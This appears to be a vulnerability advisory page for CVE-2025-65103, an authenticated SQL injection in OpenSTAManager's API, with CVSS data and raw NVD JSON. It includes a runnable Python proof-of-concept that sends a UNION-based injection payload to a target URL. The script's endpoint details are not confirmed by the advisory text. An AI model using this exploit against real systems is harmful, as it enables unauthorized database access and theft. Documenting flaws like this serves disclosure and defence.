Security Vulnerability Report
中文
CVE-2025-65103 CVSS 8.8 HIGH

CVE-2025-65103

Published: 2025-11-19 20:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenSTAManager < 2.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-65103 OpenSTAManager SQL Injection PoC # Target: OpenSTAManager < 2.9.5 # Vulnerability: Authenticated SQL Injection via display parameter in API def exploit_sql_injection(target_url, session_token): """ Exploit SQL injection in OpenSTAManager API """ headers = { 'Authorization': f'Bearer {session_token}', 'Content-Type': 'application/json' } # SQL Injection payload to extract database version # Using UNION-based injection technique payload = { 'display': "1' UNION SELECT NULL,version(),user(),database()-- -", 'module': 'anagraphs' } target = f"{target_url.rstrip('/')}/api/v1/plugins" print(f"[*] Targeting: {target}") print(f"[*] Payload: {payload}") try: response = requests.post(target, json=payload, headers=headers, timeout=30) if response.status_code == 200: print("[+] Request successful - check response for SQL injection results") print(f"[+] Response: {response.text[:500]}") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <session_token>") print(f"Example: python {sys.argv[0]} https://target.com/token ABC123") sys.exit(1) target_url = sys.argv[1] session_token = sys.argv[2] exploit_sql_injection(target_url, session_token)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65103", "sourceIdentifier": "[email protected]", "published": "2025-11-19T20:15:54.107", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.